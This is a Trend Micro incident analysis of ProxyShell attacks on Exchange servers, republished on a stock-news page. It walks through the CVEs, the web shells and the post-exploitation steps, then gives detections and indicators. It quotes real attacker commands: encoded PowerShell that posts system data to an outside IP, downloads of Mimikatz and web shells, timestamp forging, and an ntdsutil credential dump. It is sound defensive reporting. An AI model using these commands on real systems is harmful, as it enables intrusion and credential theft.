Log in
E-mail
Password
Show password
Remember
Forgot password ?
Become a member for free
Sign up
Sign up
New member
Sign up for FREE
New customer
Discover our services
Settings
Settings
Dynamic quotes 
OFFON
  1. Homepage
  2. Equities
  3. Japan
  4. Japan Exchange
  5. Trend Micro
  6. News
  7. Summary
    4704   JP3637300009

TREND MICRO

(4704)
  Report
SummaryQuotesChartsNewsRatingsCalendarCompanyFinancialsConsensusRevisions 
SummaryMost relevantAll NewsOther languagesPress ReleasesOfficial PublicationsSector news

Trend Micro Incorporated : Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

11/17/2021 | 08:18am EST

The Trend Trend Micro™ Managed XDR team recently observed a surge in server-side compromises - ProxyShell-related intrusions on Microsoft Exchange in particular via the Managed XDR service and other incident response engagements. These compromises, which occurred across different sectors in the Middle East, were most often observed in environments using on-premise implementations of Microsoft Exchange.

In the engagements where the attacker's objective was realized, we found that the deployment of ransomware was the most common end-goal for the attacks that occurred in the Middle East. This indicates that threat actor groups have begun to favor the use of exploits related to ProxyShell in order to establish initial access to an organization's system, with the possibility of ransomware attacks being launched down the line.

Using intrusion clusters that had overlaps in initial access techniques, we recently found a set of intrusions that were involved with attacks on the Middle East, which we will be dissecting in this blog entry. All of these intrusions, which share a commonality of exploiting vulnerable ProxyShell servers to gain an initial foothold on their target's network, were rooted from an IIS Worker Process that was spawning suspicious processes.

Through our observation of the web shell activity on the Trend Micro Vision One Platform and by analyzing the process tree created by the Internet Information Services (IIS) process w3wp.exe, we were able to determine the sequence of processes that are associated with the different attack phases and how they tied in to the threat actor's objective.

We clustered all the observed intrusions together to reveal some tactical and operational similarities between all the different ransomware affiliates that were deploying the final ransomware payloads. Through the Vision One platform, some intrusions were interrupted early in the infection chain, after which we compared these to other similar intrusions to determine the chain of events (and whetherLockFile,Conti, or any current active ransomware families in the Middle East threat landscape will be deployed as part of the routine).

In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.

Observations on the ProxyShell Exploitation The exploitation of ProxyShell in these attacks involve three vulnerabilities:CVE-2021-34473,CVE-2021-34523andCVE-2021-31207- the first two were patched in July 2021, while the latter was fixed in May 2021. Successful exploitation of these vulnerabilities can lead to arbitrary writing of files that an attacker can leverage toupload web shells on a target exchange server.

The malicious actor initially tried to start the attack by scanning for dropped web shells, which we assume were dropped earlier via vulnerability exploitation. This part failed, as the files showed a 404 error code when we tried to access them.

Figure 1. Scanning for web shells
CVE-2021-34473: pre-auth path confusion This vulnerability abuses the URL normalization of Explicit Logon URL, where the login email will be removed from the URL if the URL suffix is autodiscover/autodiscover.json. This allows arbitrary backend URL access as the Exchange machine account (NT AUTHORITYSYSTEM).
Figure 2. Exploiting CVE-2021-34473

The Autodiscover service is abused to leak a known user's distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then abused to leak the user's security identifier (SID).

CVE-2021-34523: Exchange PowerShell Backend Elevation-of-Privilege Microsoft Exchange has a PowerShell remoting feature which can be used to read and send emails. This functionality cannot be used by NT AUTHORITYSYSTEM as it doesn't have a mailbox, however, the backend /powershell can be provided via the X-Rps-CAT query string parameter in case it is accessed directly using the previous vulnerability, which will be deserialized and used to restore the user identity.

This technique can be used by an attacker to impersonate a local administrator in order to run PowerShell commands.

Figure 3. An attacker using local administrator account administrator@xxxx along with its SID
CVE-2021-31207: Post-auth Arbitrary-File-Write This vulnerability leverages the New-MailboxExportRequest PowerShell command in order to export the user mailbox to an arbitrary file location, which can be used to write a shell on the Exchange server.
Figure 4. Access to the web shell after being imported

The web shell is imported as mail inside theadministrator@xxxdraft mailbox. It is then exported to c:/inetpub/wwwroot/aspnet_client/puqjc.aspx, after which it is accessed and returned with 200 codes.

An analysis of the file system timeline shows the same - the puqjc.aspx file was created at the same time as the malicious web connection (2:00 PM UTC)

Figure 5. The system timeline showing the creation of the file puqjc.aspx
Post-exploitation routines A web shell is a piece of code written in web development programming language (e.g., ASP, JSP) that attackers can drop into web servers to gain remote access and the ability to execute arbitrary code and commands to meet their objectives. Once a web shell is successfully inserted into the victim's server, it can allow remote attackers to perform various tasks, such as stealing data or dropping other malicious tools.

Upon analysis of the intrusion clusters, we were able to identify several variants of web shells used by different threat actors. The scanning and exploitation phases were the same in all the incidents, but the post-exploitation activities and their impact varied.

The following subsections go into the specifics of the post-exploitation routines we analyzed in four separate incidents that occurred in August and September 2021. While some of the incidents shared certain behaviors during infection, their post-exploitation routines varied.

Incident # 1 The first web shell Figure 6. Code showing the exec_code query parameter

In the first incident we handled, we discovered that the web shell employed in the attack usesexec_codequery parameter to execute ASP code. After successfully accessing the command-and-control (C&C) server, it executed commands to gather basic information on the compromised system.

  • "c:windowssystem32cmd.exe" /c whoami
  • "c:windowssystem32cmd.exe" /c ping -n 1 google.com

Furthermore, the web shell also executed PowerShell commands, and downloaded and executed other malware.

Figure 7. Executing PowerShell commands and downloading other malware
rundll.bat The web shell includes a script that kills security software from specific vendors, and then disables the system's firewall.
Figure 8. Code showing how the script terminates security software

It then executes a PowerShell-encoded base64 script that downloads another obfuscated PowerShell script, which it then executes. This script is part of the CobaltStrike malware familly which has the ability to provide backdoor access to infected machines.

Figure. 9 Decoded PowerShell command to download and execute Cobalt Strike
Figure 10. Code from the Cobalt Strike obfuscated PowerShell

We also noticed that the malicious actor behind the attack executed scripts to kill specific processes and to clear the PowerShell Windows events log.

Figure 11. Script designed to kill PowerShell-related processes
Liferay CMS The IP addresses 212.84.32[.]13 and 103.25.196[.]33, are servers using theLiferay content managing system(CMS). It seems that these are compromised versions of the software and being used to host the post-exploitation malicious payloads on different ports other than the default ones (80, 443, 8080) used by the CMS.
Figure 12. Properties of the Liferay CMS versions found on the IP addresses 212.84.32[.]13 and 103.25.196[.]33

Both servers are using Liferay CE version 6.2, which is vulnerable toCVE-2020-7961(possibly leading to remote code execution).

Incident # 2 Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.

Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don't have information as to what was downloaded since the URL was already dead by the time of analysis.

"C:WindowsSystem32cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

  • cmd.exe /c ipconfig
  • cmd.exe /c dir
  • "c:windowssystem32cmd.exe" /c ping -n 1 google.com
  • "c:windowssystem32cmd.exe" /c whoami

The web shell was then copied and the original entry deleted using the following commands:

  • cmd.exe /c ren C:inetpubwwwrootaspnet_clienterrorFF.aspx.req errorFF.aspx
  • "c:windowssystem32cmd.exe" /c del "C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaautherrorFF.aspx.req"

The ipconfig command was executed as an argument for a wget request.

The following code shows the Powershell-encoded (top) and decoded (bottom) commands:

"c:windowssystem32cmd.exe" /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA

$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"

Mimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:

"c:windowssystem32cmd.exe" /c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=

Invoke-WebRequest -Uri "http://91.92.136.250:443/mimi.exe" -OutFile "c:windowstempmimi.exe"

The web shell then downloaded an additional .aspx web shell and timestamped it to further disguised itself in the system, seen in the following code:

Invoke-WebRequest -Uri "http://91.92.136.250:443/out.aspx" -OutFile "c:windowstempOutlookCM.aspx"

The web shell was then moved to the OWA directory with the following time stamp:

$f1=(Get-Item 'C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthOutlookCM.aspx'); $f2=(Get-Item 'C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthOutlookCN.aspx'); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;

After a few minutes, additional DLLs were created, which was later verified to be web shell files created either by w3wp.exe or UMWorkerProcess.exe.

  • c:windowsmicrosoft.netframework64v4.0.30319temporary asp.net filesowa8e05b027e164d61bapp_web_ffhsdhdi.dll
  • c:windowsmicrosoft.netframework64v4.0.30319temporary asp.net filesowa8e05b027e164d61bapp_web_m123qbjp.dll

In relation to this incident, we found the following malicious components and malware were used:

  • OutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)
  • App_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)
  • App_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)

Other web shells

During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.net page, which is quite unusual since most web shells that we find are written in PHP instead. This is similar to thebespoke web shellthe KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version of it in the same system.
Figure 13. The web shell written in C#
Figure 14. C# web shell function which executes the Base64 command in CMD
Figure 15. Web shell response for known inputs only, otherwise it will respond with error code 404
Incident #3 The third incident was different from the first two incidents in terms of credential dumping techniques and lateral movement within the system.In this case, the Microsoft Process Dump tool was used to dump LSSAS and extract the hashes.
Figure 16. The execution for procedump.exe during the active attack

The Windows utility PsExec was detected during the lateral movement phase. The attacker used it to access remote machines and servers in order to drop and execute a new backdoor malware.

Apass-the-hash attack techniquewas used to access remote servers and machines, after which a new malware component was dropped in order to create persistence.

Figure 17. Using a pass-the-hash technique for remote access

The following malware were dropped on the infected machines:

  • CacheTask.dll (Backdoor.Win32.COTX.A)
  • dllhost.exe (PUA.Win64.LanGO.B)
  • HostDLL.exe (Trojan.Win64.OGNHOST.A)
Persistence was then created on remote machines via scheduled task to keep the backdoor running.
Figure 18. Creating persistence via scheduled task
Incident # 4 We analyzed a fourth incident that had an interesting technique for credential dumping, specifically, dumping the database via the NT Directory Service Utility:

"C:Windowssystem32cmd[.]exe" /c ntdsutil "activate instance ntds" ifm "create full c:windowstempntd" quit quit

Execution Profile Here is an example of a post-exploitation routine using the ProxyShell instance. After the web shells are dropped, cmd.exe and powershell.exe are used to execute commands on the affected systems.
Figure 19. Trend Micro Vision One ™ console showing the post-exploitation routine using a ProxyShell instance
Security recommendations For the incidents that we encountered, it should be noted that the affected Microsoft Exchange servers were left unpatched, either knowingly or unknowingly, by their respective IT teams.Microsoft had writtenin August 2021 that patching to the latest cumulative update (CU) or security update (SU) are indeed the first line of defense against threats that exploit vulnerabilities related to ProxyShell.

While mitigation controls, such as the implementation of a host-based or network-based intrusion prevention system (HIPS/NIPS), can be applied to these severs, it should be noted that these controls would only buy time before any actual patching should occur, providing leeway for IT teams to allow them to trigger the appropriate change management controls.

It is also worthwhile to note that a Microsoft Exchange server would still have an active web shell even if it's patched after a successful compromise. This means that servers that have been compromised via vulnerabilities related to ProxyShell should be inspected thoroughly for any malicious activities since web shells may already exist (and could continue to still be operational). An active web shell can still allow a malicious actor to continue pursuing their chosen objectives such as ransomware infection, cryptocurrency mining, and data exfiltration.

The implementation of proper segmentation for publicly-exposed servers should always be reviewed, with their behavior (i.e., processes being launched, anti-malware violations, or network traffic profile) being monitored constantly. For example, the observation of internal network scanning, SMB traffic, or other unusual traffic that has not been seen historically can be a sign that the server has been compromised. Earlier this year,Microsoft wrote an excellent guidefor hardening web servers against web shell-based attacks.

Trend Micro Solutions The capabilities of theTrend Micro Vision One™platform made both the detection of this attack and our investigation into it possible. We took into account metrics from the network and endpoints that would indicate potential attempts of exploitation. The Trend Micro Vision One Workbench shows a holistic view of the activities that are observed in a user's environment by highlighting important attributes related to the attack.

Trend Micro Managed XDRoffers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing 24/7 service that allows organizations to have one single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro's wealth of global threat intelligence.

TrendMicro Detections
Product Name
Detections
Endpoint Security products:
Real Time scan
Behavior monitoring
  • Backdoor.ASP.CHOPPER.ASPGJI
  • Backdoor.PHP.WEBSHELL.SBJKWQ
  • Backdoor.ASP.WEBSHELL.UWMAQF
  • ·Trojan.ASP.WEBSHELL.GIFCM
  • Trojan.ASP.CVE202127065.E
  • Trojan.PS1.COBEACON.SMYXAK-A
  • TROJ_FRS.VSNW1FH21
  • Backdoor.Win32.COTX.A ()
  • PUA.Win64.LanGO.B
  • Trojan.Win64.OGNHOST.A
  • Fileless.AMSI.PSCoBeacon
Endpoint Security:
Deep Security IPS:
  • 1011041 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-34473)
  • 1011050 - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2021-34523)
  • 1011072 - Microsoft Exchange Server Security Feature Bypass Vulnerability (CVE-2021-31207)
Network Security:
TippingPoint
  • 39522: Microsoft Exchange Server Autodiscover SSRF Vulnerability (CVE-2021-34473)
  • 39534: HTTP: Microsoft Exchange Server PowerShell Code Execution Vulnerability (CVE-2021-34523)
  • 40057: HTTP: Microsoft Exchange Server Arbitrary File Write Vulnerability (CVE-2021-31207)
Network Security: DDI Deep Discovery Inspector
  • CVE-2021-34473 - EXCHANGE SSRF EXPLOIT - HTTP(REQUEST)
  • CVE-2021-31207 - EXCHANGE EXPLOIT - HTTP(RESPONSE)

Indicators of Compromise

Hashes

SHA256
Details
Detection Name
428D445BA0354CFE78485A50B52B04A949259D32CA939FCE151AA3DD3F352066
rundll.bat
HackTool.BAT.WinDefKiller.C
28356225C68A84A45C603C5E2EA91A1B2B457DB6F056D82B210CA7853F5CD2F8
CacheTask.dll
Backdoor.Win32.COTX.A
E3EAC25C3BEB77FFED609C53B447A81EC8A0E20FB94A6442A51D72CA9E6F7CD2
dllhost.exe
PUA.Win64.LanGO.B
27CB14B58F35A4E3E13903D3237C28BB386D5A56FEA88CDA16CE01CBF0E5AD8E
HostDLL.exe
Trojan.Win64.OGNHOST
5154E76030A08795D22B6CB51F6EA735C3C662409286F21A29B4037231F47043
Trojan.PS1.COBEACON.SMYXAK-A

IPs & URL

  • hxxp:[//]103.25[.]196.33:51680[/]check.
  • hxxp:[//]212.84.32.13:18080[/]get
  • hxxps:[//]122.10.82.109:8090[/]connect
  • hxxp: [//]raw.githubusercontent.com/threatexpress/subshell/master/subshell.aspx
  • 103[.]25[.]196[.]33
  • 212[.]84[.]32[.]13
  • 122[.]10[.]82[.]109
  • 209.14.0[.]234

Strings(IIS Logs)

  • autodiscover/autodiscover.json
  • @evil.corp
  • python-requests
  • /powershell/?X-Rps-CAT
  • Cmd commands like (whoami, taskkill, ping, dir, ipconfig)

Vulnerabilities

  • CVE-2021-34473
  • CVE-2021-34523
  • CVE-2021-31207
Tags
Authors
  • Mohamed Fahmy
  • Threat Intelligence Analyst
  • Abdelrhman Sharshar
  • Threat Intelligence Analyst
  • Sherif Magdy
  • Threat Intelligence Analyst
  • Ryan Maglaque
  • Threats Analyst

Disclaimer

Trend Micro Inc. published this content on 17 November 2021 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 17 November 2021 13:17:05 UTC.


ę Publicnow 2021
All news about TREND MICRO
01/25TREND MICRO : TianySpy Malware Uses Smishing Disguised as Message From Telco
PU
01/24TREND MICRO : Analysis and Impact of LockBit Ransomware's First Linux and VMware ESXi Vari..
PU
01/24TREND MICRO : Investigating APT36 or Earth Karkaddan's Attack Chain and Malware Arsenal
PU
01/21TREND MICRO : This Week in Security News - January 21, 2022
PU
01/21CODEX EXPOSED : Task Automation and Response Consistency
PU
01/21TREND MICRO : Emotet Spam Abuses Unconventional IP Address Formats to Spread Malware
PU
01/20CYBERSECURITY FOR INDUSTRIAL CONTROL : Part 2
PU
01/20TREND MICRO : Defending Users' NAS Devices From Evolving Threats
PU
01/18NEW RANSOMWARE SPOTTED : White Rabbit and Its Evasion Tactics
PU
01/17TREND MICRO : Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Technique..
PU
More news
Financials
Sales 2021 188 B 1 648 M 1 648 M
Net income 2021 34 962 M 306 M 306 M
Net cash 2021 182 B 1 594 M 1 594 M
P/E ratio 2021 23,4x
Yield 2021 3,24%
Capitalization 825 B 7 243 M 7 228 M
EV / Sales 2021 3,42x
EV / Sales 2022 3,15x
Nbr of Employees 6 975
Free-Float -
Chart TREND MICRO
Duration : Period :
Trend Micro Technical Analysis Chart | MarketScreener
Full-screen chart
Technical analysis trends TREND MICRO
Short TermMid-TermLong Term
TrendsBearishNeutralNeutral
Income Statement Evolution
Consensus
Sell
Buy
Mean consensus HOLD
Number of Analysts 12
Last Close Price 5 910,00 JPY
Average target price 6 983,64 JPY
Spread / Average Target 18,2%
EPS Revisions
Managers and Directors
Yi Fen Chen Auditor
Mahendra Negi Group CFO, COO & Representative Director
Ming Jang Chang Representative Director
Max Cheng Chief Information Officer & Executive VP
Kevin Simzer Chief Operating Officer
Sector and Competitors
1st jan.Capi. (M$)
TREND MICRO-7.51%7 243
MICROSOFT CORPORATION-14.22%2 165 977
SEA LIMITED-35.22%81 436
ATLASSIAN CORPORATION PLC-24.81%72 461
DASSAULT SYSTÈMES SE-19.25%62 748
SYNOPSYS INC.-20.85%44 752